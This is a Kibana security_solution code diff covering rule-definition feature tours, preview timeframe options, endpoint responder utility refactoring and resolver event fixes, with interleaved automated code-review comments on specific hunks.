'../rule_preview/helpers'; import { NewTermsFields } from '../new_terms_fields'; import { ScheduleItem } from '../schedule_item_form'; import { DocLink } from '../../../../common/components/links_to_docs/doc_link'; +import { StepDefineRuleNewFeaturesTour } from './new_features_tour'; const CommonUseField = getUseField({ component: Field }); @@ -511,10 +512,15 @@ const StepDefineRuleComponent: FC = ({ /> ); }, [kibanaDataViews]); + const DataSource = useMemo(() => { return ( - - + + = ({ ); }, [ dataSourceType, + onChangeDataSource, dataViewIndexPatternToggleButtonOptions, DataViewSelectorMemo, indexModified, handleResetIndices, - onChangeDataSource, ]); const QueryBarMemo = useMemo( @@ -679,6 +685,7 @@ const StepDefineRuleComponent: FC = ({ ) : ( <> +
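Review bot: In the `@@ -60,8 +61,23` hunk `setTimeframeEnd` is listed as an effect dependency although React state setters are stable, so `[isRequestTriggered]` is enough; and `useState(moment())` evaluates `moment()` on every render where a lazy `useState(() => moment())` would run it once. The effect only refreshes `timeframeEnd` when `isRequestTriggered` changes to `true`, so if the flag can stay `true` across consecutive previews the end time would not move; how the flag is reset is outside the hunk, so that is worth checking. `usePreviewRoute` continues outside the hunk.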
+

{i18n.DATA_SOURCE_GUIDE_CONTENT}

+ + + ), + anchor: `#dataSourceSelector`, + anchorPosition: 'rightCenter' as const, + stepsTotal: 1, + onFinish: noop, + }, +]; + +export const StepDefineRuleNewFeaturesTour: FC = () => { + const { storage } = useKibana().services; + + const restoredState = useMemo( + () => ({ + ...tourConfig, + ...storage.get(TOUR_STORAGE_KEY), + }), + [storage] + ); + + const [tourSteps, , tourState] = useEuiTour(stepsConfig, restoredState); + + useEffect(() => { + const { isTourActive, currentTourStep } = tourState; + storage.set(TOUR_STORAGE_KEY, { isTourActive, currentTourStep }); + }, [tourState, storage]); + + const [shouldShowTour, setShouldShowTour] = useState(false); + + useEffect(() => { + /** + * Wait until the tour target elements are visible on the page and mount + * EuiTourStep components only after that. Otherwise, the tours would never + * show up on the page. + */ + const observer = new MutationObserver(() => { + if (document.querySelector(stepsConfig[0].anchor)) { + setShouldShowTour(true); + observer.disconnect(); + } + }); + + observer.observe(document.body, { + childList: true, + subtree: true, + }); + + return () => observer.disconnect(); + }, []); + + return shouldShowTour ? : null; +}; diff --git a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx index 2242d679b1f28..458ab73dd1bb8 100644 --- a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/translations.tsx 
@@ -99,6 +99,27 @@ export const SOURCE = i18n.translate( } ); +export const DATA_SOURCE_GUIDE_SUB_TITLE = i18n.translate( + 'xpack.securitySolution.detections.dataSource.popover.title', + { + defaultMessage: 'Select a data source', + } +); + +export const DATA_SOURCE_GUIDE_TITLE = i18n.translate( + 'xpack.securitySolution.detections.dataSource.popover.subTitle', + { + defaultMessage: 'Data sources', + } +); + +export const DATA_SOURCE_GUIDE_CONTENT = i18n.translate( + 'xpack.securitySolution.detections.dataSource.popover.content', + { + defaultMessage: 'Rules can now query index patterns or data views.', + } +); + export const RULE_PREVIEW_TITLE = i18n.translate( 'xpack.securitySolution.detectionEngine.createRule.stepDefineRule.rulePreviewTitle', { diff --git a/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts b/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts index a8b12a9ebc121..ed7f4150f7349 100644 --- a/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts +++ b/x-pack/plugins/security_solution/public/detections/containers/detection_engine/rules/use_preview_rule.ts @@ -8,7 +8,6 @@ import { useEffect, useMemo, useState } from 'react'; import moment from 'moment'; -import type { Unit } from '@kbn/datemath'; import { RULE_PREVIEW_FROM, RULE_PREVIEW_INTERVAL, @@ -23,7 +22,10 @@ import type { import { previewRule } from './api'; import * as i18n from './translations'; import { transformOutput } from './transforms'; -import type { AdvancedPreviewOptions } from '../../../pages/detection_engine/rules/types'; +import type { + AdvancedPreviewOptions, + QuickQueryPreviewOptions, +} from '../../../pages/detection_engine/rules/types'; import { getTimeTypeValue } from '../../../pages/detection_engine/rules/create/helpers'; const REASONABLE_INVOCATION_COUNT = 200; 
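Review bot: The message ids in the `@@ -99,6 +99,27` hunk look swapped: `DATA_SOURCE_GUIDE_SUB_TITLE` is keyed `xpack.securitySolution.detections.dataSource.popover.title` while `DATA_SOURCE_GUIDE_TITLE` is keyed `...popover.subTitle`. These ids become the keys in the extracted translation bundles, so they should be exchanged before translators pick them up: `'xpack.securitySolution.detections.dataSource.popover.subTitle'` on `DATA_SOURCE_GUIDE_SUB_TITLE` and `'xpack.securitySolution.detections.dataSource.popover.title'` on `DATA_SOURCE_GUIDE_TITLE`.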
@@ -35,10 +37,10 @@ const emptyPreviewRule: PreviewResponse = { }; export const usePreviewRule = ({ - timeframe = 'h', + quickQueryOptions, advancedOptions, }: { - timeframe: Unit; + quickQueryOptions: QuickQueryPreviewOptions; advancedOptions?: AdvancedPreviewOptions; }) => { const [rule, setRule] = useState(null); @@ -49,7 +51,7 @@ export const usePreviewRule = ({ let interval: string = RULE_PREVIEW_INTERVAL.HOUR; let from: string = RULE_PREVIEW_FROM.HOUR; - switch (timeframe) { + switch (quickQueryOptions.timeframe) { case 'd': invocationCount = RULE_PREVIEW_INVOCATION_COUNT.DAY; interval = RULE_PREVIEW_INTERVAL.DAY; @@ -67,8 +69,11 @@ export const usePreviewRule = ({ break; } const timeframeEnd = useMemo( - () => (advancedOptions ? advancedOptions.timeframeEnd.toISOString() : moment().toISOString()), - [advancedOptions] + () => + advancedOptions + ? advancedOptions.timeframeEnd.toISOString() + : quickQueryOptions.timeframeEnd.toISOString(), + [advancedOptions, quickQueryOptions] ); if (advancedOptions) { diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts index 7fe7a9bd86012..5a15f03b9810d 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/bulk_actions/utils/dry_run_result.ts 
@@ -38,7 +38,7 @@ export const processDryRunResult = (response: BulkActionResponse | undefined): D */ export const transformExportDetailsToDryRunResult = (details: ExportRulesDetails): DryRunResult => { return { - succeededRulesCount: details.exported_count, + succeededRulesCount: details.exported_rules_count, failedRulesCount: details.missing_rules_count, // if there are rules that can't be exported, it means they are immutable. So we can safely put error code as immutable ruleErrors: details.missing_rules.length diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md index 025a2e0c215d5..95628008407cd 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/README.md @@ -16,12 +16,12 @@ New features and fixes to track: ## How to revive this tour for the next release (if needed) -1. Update Kibana version in `RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY`. +1. Update Kibana version in `NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE`. Set it to a version you're going to implement a feature tour for. 2. Define the steps for your tour. See `RulesFeatureTour` and `stepsConfig`. -3. Define and set an anchor `id` for every step's target HTML element. +3. Define and set an anchor `id` for every step's target HTML element. 4. Render `RulesFeatureTour` component somewhere on the Rule Management page. Only one instance of that component should be present on the page. 
diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx index 5f906c2cc8a8a..9558aab5239bb 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/all/feature_tour/rules_feature_tour.tsx @@ -23,7 +23,7 @@ import { import { noop } from 'lodash'; import type { FC } from 'react'; import React, { useEffect, useMemo, useState } from 'react'; -import { RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY } from '../../../../../../../common/constants'; +import { NEW_FEATURES_TOUR_STORAGE_KEYS } from '../../../../../../../common/constants'; import { useKibana } from '../../../../../../common/lib/kibana'; import * as i18n from './translations'; @@ -34,6 +34,7 @@ export interface RulesFeatureTourContextType { export const SEARCH_CAPABILITIES_TOUR_ANCHOR = 'search-capabilities-tour-anchor'; +const TOUR_STORAGE_KEY = NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE; const TOUR_POPOVER_WIDTH = 400; const tourConfig: EuiTourState = { @@ -61,7 +62,7 @@ export const RulesFeatureTour: FC = () => { const restoredState = useMemo( () => ({ ...tourConfig, - ...storage.get(RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY), + ...storage.get(TOUR_STORAGE_KEY), }), [storage] ); @@ -70,7 +71,7 @@ export const RulesFeatureTour: FC = () => { useEffect(() => { const { isTourActive, currentTourStep } = tourState; - storage.set(RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY, { isTourActive, currentTourStep }); + storage.set(TOUR_STORAGE_KEY, { isTourActive, currentTourStep }); }, [tourState, storage]); const [shouldShowSearchCapabilitiesTour, setShouldShowSearchCapabilitiesTour] = useState(false); 
diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts index ce4060dcf6e87..93910509193e2 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts @@ -19,6 +19,7 @@ import type { import type { Filter } from '@kbn/es-query'; import type { RuleAction } from '@kbn/alerting-plugin/common'; import type { DataViewListItem } from '@kbn/data-views-plugin/common'; +import type { Unit } from '@kbn/datemath'; import type { RuleAlertAction } from '../../../../../common/detection_engine/types'; import type { FieldValueQueryBar } from '../../../components/rules/query_bar'; @@ -242,6 +243,11 @@ export interface ActionsStepRuleJson { meta?: unknown; } +export interface QuickQueryPreviewOptions { + timeframe: Unit; + timeframeEnd: moment.Moment; +} + export interface AdvancedPreviewForm { interval: string; lookback: string; diff --git a/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx b/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx index 2d07932e388b4..b6085ed5356c0 100644 --- a/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx +++ b/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx 
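Review bot: `QuickQueryPreviewOptions` in the `@@ -242,6 +243,11` hunk is exported without a TSDoc comment, and its two fields carry different semantics (a relative unit and an absolute instant). A short comment would help, e.g. `/** Options for the quick-query rule preview: the datemath unit chosen in the UI and the moment the preview was requested, as consumed by usePreviewRule. */`. `timeframe` is typed as the full datemath `Unit`, which is wider than what the consuming `switch` in usePreviewRule handles (only the `'d'` case is visible in this chunk, with an hour fallback); if the UI offers a fixed set of units, a narrower literal union would catch mismatches at compile time.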
@@ -31,7 +31,7 @@ export const BadArgument = memo + (({ commands, display = 'defaul {commandsByGroups.map((commandsByGroup) => { const groupLabel = commandsByGroup[0].helpGroupLabel; const filteredCommands = getFilteredCommands(commandsByGroup); + + if (filteredCommands.length === 0) { + return null; + } + return ( props.theme.eui.euiCodeFontFamily}; +`; export const ConsoleCodeBlock = memo<{ children: ReactNode; inline?: boolean; - textColor?: 'default' | 'error' | 'success'; + textColor?: EuiTextProps['color']; bold?: boolean; }>(({ children, inline = false, textColor = 'default', bold = false }) => { - const baseStyledComponent = inline ? EuiTextColor : EuiText; - - const CodeBlock = euiStyled(baseStyledComponent).attrs({ - transparentBackground: true, - size: 's', - })`{ - color: ${(props) => { - if (textColor === 'error') { - return props.theme.eui.euiColorDanger; - } else if (textColor === 'success') { - return props.theme.eui.euiColorSuccessText; - } else { - return props.theme.eui.euiColorDarkestShade; - } - }}; - font-weight: ${(props) => { - return bold ? props.theme.eui.euiFontWeightBold : props.theme.eui.euiFontWeightRegular; - }}; - font-family: ${(props) => props.theme.eui.euiCodeFontFamily}; - padding: 0; - } - `; - - return {children}; + return ( + + {bold ? {children} : children} + + ); }); ConsoleCodeBlock.displayName = 'ConsoleCodeBlock'; diff --git a/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx b/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx index 7041b2e166f47..117ac7f8438aa 100644 --- a/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx +++ b/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx @@ -56,7 +56,7 @@ export const UnknownCommand = memo(({ command, s return ( + { describe('when using parseCommandInput()', () => { 
@@ -145,21 +145,4 @@ describe('when using parsed command input utils', () => { ); }); }); - - describe('when using parsedPidOrEntityIdParameter()', () => { - it('should parse a pid as a number and return proper params', () => { - const parameters = parsedPidOrEntityIdParameter({ pid: ['123'] }); - expect(parameters).toEqual({ pid: 123 }); - }); - - it('should parse an entity id correctly and return proper params', () => { - const parameters = parsedPidOrEntityIdParameter({ entityId: ['123qwe'] }); - expect(parameters).toEqual({ entity_id: '123qwe' }); - }); - - it('should return undefined if no params are defined', () => { - const parameters = parsedPidOrEntityIdParameter({}); - expect(parameters).toEqual(undefined); - }); - }); }); diff --git a/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts b/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts index 984dd77eb4786..32477e6783832 100644 --- a/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts +++ b/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts @@ -8,7 +8,6 @@ /* eslint-disable @typescript-eslint/no-explicit-any */ import type { CommandDefinition } from '..'; -import type { EndpointActionDataParameterTypes } from '../../../../../common/endpoint/types'; export type ParsedArgData = string[]; @@ -185,16 +184,3 @@ export const getArgumentsForCommand = (command: CommandDefinition): string[] => ? [buildArgumentText({ required: requiredArgs, optional: optionalArgs })] : []; }; - -export const parsedPidOrEntityIdParameter = (parameters: { - pid?: ParsedArgData; - entityId?: ParsedArgData; -}): EndpointActionDataParameterTypes => { - if (parameters.pid) { - return { pid: Number(parameters.pid[0]) }; - } else if (parameters.entityId) { - return { entity_id: parameters.entityId[0] }; - } - - return undefined; -}; 
diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx index 111575a94521b..fd749bb1562db 100644 --- a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx @@ -8,6 +8,7 @@ import React, { memo, useEffect } from 'react'; import { FormattedMessage } from '@kbn/i18n-react'; import type { IHttpFetchError } from '@kbn/core-http-browser'; +import { parsedPidOrEntityIdParameter } from './utils'; import { ActionSuccess } from './action_success'; import type { ActionDetails, @@ -17,7 +18,6 @@ import { useGetActionDetails } from '../../hooks/endpoint/use_get_action_details import type { EndpointCommandDefinitionMeta } from './types'; import { useSendKillProcessRequest } from '../../hooks/endpoint/use_send_kill_process_endpoint_request'; import type { CommandExecutionComponentProps } from '../console/types'; -import { parsedPidOrEntityIdParameter } from '../console/service/parsed_command_input'; import { ActionError } from './action_error'; import { ACTION_DETAILS_REFRESH_INTERVAL } from './constants'; diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx index 10c3a7d1a4a0d..d29dd4cbdee02 100644 --- a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx 
@@ -8,6 +8,7 @@ import React, { memo, useEffect } from 'react'; import { FormattedMessage } from '@kbn/i18n-react'; import type { IHttpFetchError } from '@kbn/core-http-browser'; +import { parsedPidOrEntityIdParameter } from './utils'; import { ActionSuccess } from './action_success'; import type { ActionDetails, @@ -17,7 +18,6 @@ import { useGetActionDetails } from '../../hooks/endpoint/use_get_action_details import type { EndpointCommandDefinitionMeta } from './types'; import { useSendSuspendProcessRequest } from '../../hooks/endpoint/use_send_suspend_process_endpoint_request'; import type { CommandExecutionComponentProps } from '../console/types'; -import { parsedPidOrEntityIdParameter } from '../console/service/parsed_command_input'; import { ActionError } from './action_error'; import { ACTION_DETAILS_REFRESH_INTERVAL } from './constants'; diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.test.ts b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.test.ts new file mode 100644 index 0000000000000..ab84e9de959f0 --- /dev/null +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.test.ts 
@@ -0,0 +1,27 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+import { parsedPidOrEntityIdParameter } from './utils';
+
+describe('Endpoint Responder - Utilities', () => {
+ describe('when using parsedPidOrEntityIdParameter()', () => {
+ it('should parse a pid as a number and return proper params', () => {
+ const parameters = parsedPidOrEntityIdParameter({ pid: ['123'] });
+ expect(parameters).toEqual({ pid: 123 });
+ });
+
+ it('should parse an entity id correctly and return proper params', () => {
+ const parameters = parsedPidOrEntityIdParameter({ entityId: ['123qwe'] });
+ expect(parameters).toEqual({ entity_id: '123qwe' });
+ });
+
+ it('should return undefined if no params are defined', () => {
+ const parameters = parsedPidOrEntityIdParameter({});
+ expect(parameters).toEqual(undefined);
+ });
+ });
+});
diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.ts b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.ts
new file mode 100644
index 0000000000000..9ebcd090bd2a0
--- /dev/null
+++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.ts
@@ -0,0 +1,20 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+import type { EndpointActionDataParameterTypes } from '../../../../common/endpoint/types';
+
+export const parsedPidOrEntityIdParameter = (parameters: {
+ pid?: string[];
+ entityId?: string[];
+}): EndpointActionDataParameterTypes => {
+ if (parameters.pid) {
+ return { pid: Number(parameters.pid[0]) };
+ } else if (parameters.entityId) {
+ return { entity_id: parameters.entityId[0] };
+ }
+
+ return undefined;
+};
diff --git a/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx b/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx
index f9fe611869a85..7bc3e5ac0be6d 100644
--- a/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx
+++ b/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx
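Review bot: `parsedPidOrEntityIdParameter` coerces with `Number(parameters.pid[0])` and never checks the result, so `pid: ['abc']` or an empty `pid: []` yields `{ pid: NaN }` and `pid: ['']` yields `{ pid: 0 }`, and kill_process_action.tsx and suspend_process_action.tsx (earlier hunks) now import this helper, presumably to build the action request from it. If the console's argument validation does not already reject these inputs, guard here so a malformed pid cannot be passed on: `const pid = Number(parameters.pid[0]); return Number.isInteger(pid) ? { pid } : undefined;` — or throw, depending on how callers treat `undefined`. The new utils.test.ts in the previous hunk covers only `['123']`, so a non-numeric and an empty-array case would pin whichever behavior is chosen.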
@@ -28,7 +28,15 @@ import { jest.mock('../../hooks/endpoint/use_get_endpoint_policy_response'); jest.mock('../../hooks/endpoint/use_get_endpoint_details'); -describe('when on the policy response', () => { +// FLAKY: https://github.com/elastic/kibana/issues/136272 +// FLAKY: https://github.com/elastic/kibana/issues/139033 +// FLAKY: https://github.com/elastic/kibana/issues/139032 +// FLAKY: https://github.com/elastic/kibana/issues/139031 +// FLAKY: https://github.com/elastic/kibana/issues/139030 +// FLAKY: https://github.com/elastic/kibana/issues/139028 +// FLAKY: https://github.com/elastic/kibana/issues/139029 +// FLAKY: https://github.com/elastic/kibana/issues/139027 +describe.skip('when on the policy response', () => { const docGenerator = new EndpointDocGenerator(); const createPolicyResponse = ( overallStatus: HostPolicyResponseActionStatus = HostPolicyResponseActionStatus.success, diff --git a/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx b/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx index 122bfa6fdd07c..e5fdeb6c31638 100644 --- a/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx @@ -101,12 +101,13 @@ const getTableColumns: GetTableColumns = () => [ { field: 'id', name: i18n.CASES_TABLE_COLUMN_NAME, - truncateText: true, - textOnly: true, 'data-test-subj': 'recentlyCreatedCaseName', - render: (id: string, { name }) => ( - + {name} ), diff --git a/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx b/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx index a2373b0734ece..3ae0d5e1384c3 100644 
--- a/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx @@ -101,11 +101,13 @@ const getTableColumns: GetTableColumns = (handleClick) => [ { field: 'hostName', name: i18n.HOST_ALERTS_HOSTNAME_COLUMN, - truncateText: true, - textOnly: true, 'data-test-subj': 'hostSeverityAlertsTable-hostName', render: (hostName: string) => ( - + ), diff --git a/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx b/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx index 0eed36ff14102..3e9e79a39de58 100644 --- a/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx @@ -59,6 +59,7 @@ export const getTableColumns: GetTableColumns = ({ getAppUrl, navigateTo, openRu data-test-subj={`${id}-tooltip`} title={i18n.OPEN_RULE_DETAIL_TOOLTIP} content={name} + anchorClassName="eui-textTruncate" > {/* eslint-disable-next-line @elastic/eui/href-or-on-click */} [ { field: 'userName', name: i18n.USER_ALERTS_USERNAME_COLUMN, - truncateText: true, - textOnly: true, 'data-test-subj': 'userSeverityAlertsTable-userName', render: (userName: string) => ( - + ), diff --git a/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx b/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx index f595b6a62ddbb..4035cc86bfe14 100644 --- a/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx 
+++ b/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx @@ -16,7 +16,7 @@ import { devToolPrebuiltContentUrl } from '../../../../common/constants'; import { OpenInDevConsoleButton } from '../../../common/components/open_in_dev_console'; import { useChcekSignalIndex } from '../../../detections/containers/detection_engine/alerts/use_check_signal_index'; import type { LinkPanelListItem } from '../link_panel'; -import { useSpaceId } from '../../../risk_score/containers/common'; +import { useSpaceId } from '../../../common/hooks/use_space_id'; export const RISKY_HOSTS_DOC_LINK = 'https://www.github.com/elastic/detection-rules/blob/main/docs/experimental-machine-learning/host-risk-score.md'; diff --git a/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts b/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts index 2c145c180bbde..04e694b2cedbb 100644 --- a/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts +++ b/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts @@ -89,7 +89,7 @@ export function dataAccessLayerFactory( indexPatterns, }, }; - if (category === 'alerts') { + if (category === 'alert') { return context.services.http.post('/api/endpoint/resolver/events', { query: commonFields.query, body: JSON.stringify({ @@ -193,7 +193,7 @@ export function dataAccessLayerFactory( filter: [{ term: { 'event.id': eventID } }], }, }; - if (eventCategory.includes('alerts') === false) { + if (eventCategory.includes('alert') === false) { const response: ResolverPaginatedEvents = await context.services.http.post( '/api/endpoint/resolver/events', { diff --git a/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx b/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx index 508f0763bcab1..99558f6e4a90d 100644 
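Review bot: The two hunks in factory.ts compare the category differently: `@@ -89,7 +89,7` uses `category === 'alert'` while `@@ -193,7 +193,7` uses `eventCategory.includes('alert') === false`. If `eventCategory` is a string, `includes` is a substring test and now matches any category that merely contains `alert`, where the old `'alerts'` literal was far less likely to collide; if it is a `string[]` the check is an element match and fine, but the type is not visible in the chunk. Either way the literal `'alert'` is now repeated at two sites where an exact comparison (`eventCategory === 'alert'`, or one shared constant used by both) would keep them aligned. `dataAccessLayerFactory` starts and ends outside both hunks.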
--- a/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx +++ b/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx @@ -39,6 +39,7 @@ import type { SafeResolverEvent } from '../../../../common/endpoint/types'; import { deepObjectEntries } from './deep_object_entries'; import { useFormattedDate } from './use_formatted_date'; import * as nodeDataModel from '../../models/node_data'; +import { expandDottedObject } from '../../../../common/utils/expand_dotted'; const eventDetailRequestError = i18n.translate( 'xpack.securitySolution.resolver.panel.eventDetail.requestError', @@ -158,9 +159,10 @@ function EventDetailFields({ event }: { event: SafeResolverEvent }) { namespace: React.ReactNode; descriptions: Array<{ title: React.ReactNode; description: React.ReactNode }>; }> = []; - for (const [key, value] of Object.entries(event)) { + const expandedEventObject: object = expandDottedObject(event); + for (const [key, value] of Object.entries(expandedEventObject)) { // ignore these keys - if (key === 'agent' || key === 'ecs' || key === '@timestamp') { + if (key === 'agent' || key === 'ecs' || key === '@timestamp' || !value) { continue; } diff --git a/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx b/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx index 830e41ea3a3c7..047e3302433ce 100644 --- a/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx +++ b/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx 
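Review bot: The new `|| !value` condition in the `@@ -158,9 +159,10` hunk skips every falsy field, so legitimate values such as `0`, `false` or an empty string disappear from the event detail panel together with the `null`/`undefined` entries it presumably targets — for a resolver event a `false` boolean (e.g. an ECS flag like `process.code_signature.trusted`) is exactly what an analyst needs to see. A nullish check keeps those: `if (key === 'agent' || key === 'ecs' || key === '@timestamp' || value == null) {`. Separately, annotating `expandedEventObject` as `object` discards whatever type `expandDottedObject` returns; letting it be inferred (or using `Record<string, unknown>`) keeps `value` typed for the code below. `EventDetailFields` continues outside the hunk.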
@@ -104,9 +104,10 @@ const NodeEventsListItem = memo(function ({ nodeID: string; eventCategory: string; }) { - const timestamp = eventModel.eventTimestamp(event); - const eventID = eventModel.eventID(expandDottedObject(event)); - const winlogRecordID = eventModel.winlogRecordID(event); + const expandedEvent = expandDottedObject(event); + const timestamp = eventModel.eventTimestamp(expandedEvent); + const eventID = eventModel.eventID(expandedEvent); + const winlogRecordID = eventModel.winlogRecordID(expandedEvent); const date = useFormattedDate(timestamp) || i18n.translate('xpack.securitySolution.enpdoint.resolver.panelutils.noTimestampRetrieved', { @@ -129,8 +130,8 @@ const NodeEventsListItem = memo(function ({ @@ -148,7 +149,7 @@ const NodeEventsListItem = memo(function ({ data-test-subj="resolver:panel:node-events-in-category:event-link" {...linkProps} > - + ); diff --git a/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx b/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx index 50c7a095887c0..cdafc7d63c8b1 100644 --- a/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx +++ b/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx @@ -34,7 +34,7 @@ import { useAppToasts } from '../../../common/hooks/use_app_toasts'; import { isIndexNotFoundError } from '../../../common/utils/exceptions'; import { useIsExperimentalFeatureEnabled } from '../../../common/hooks/use_experimental_features'; import type { inputsModel } from '../../../common/store'; -import { useSpaceId } from '../common'; +import { useSpaceId } from '../../../common/hooks/use_space_id'; export interface RiskScoreState { data?: RiskScoreType; diff --git a/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx b/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx index 685a0c992c9f1..396d86e2d6acc 100644 
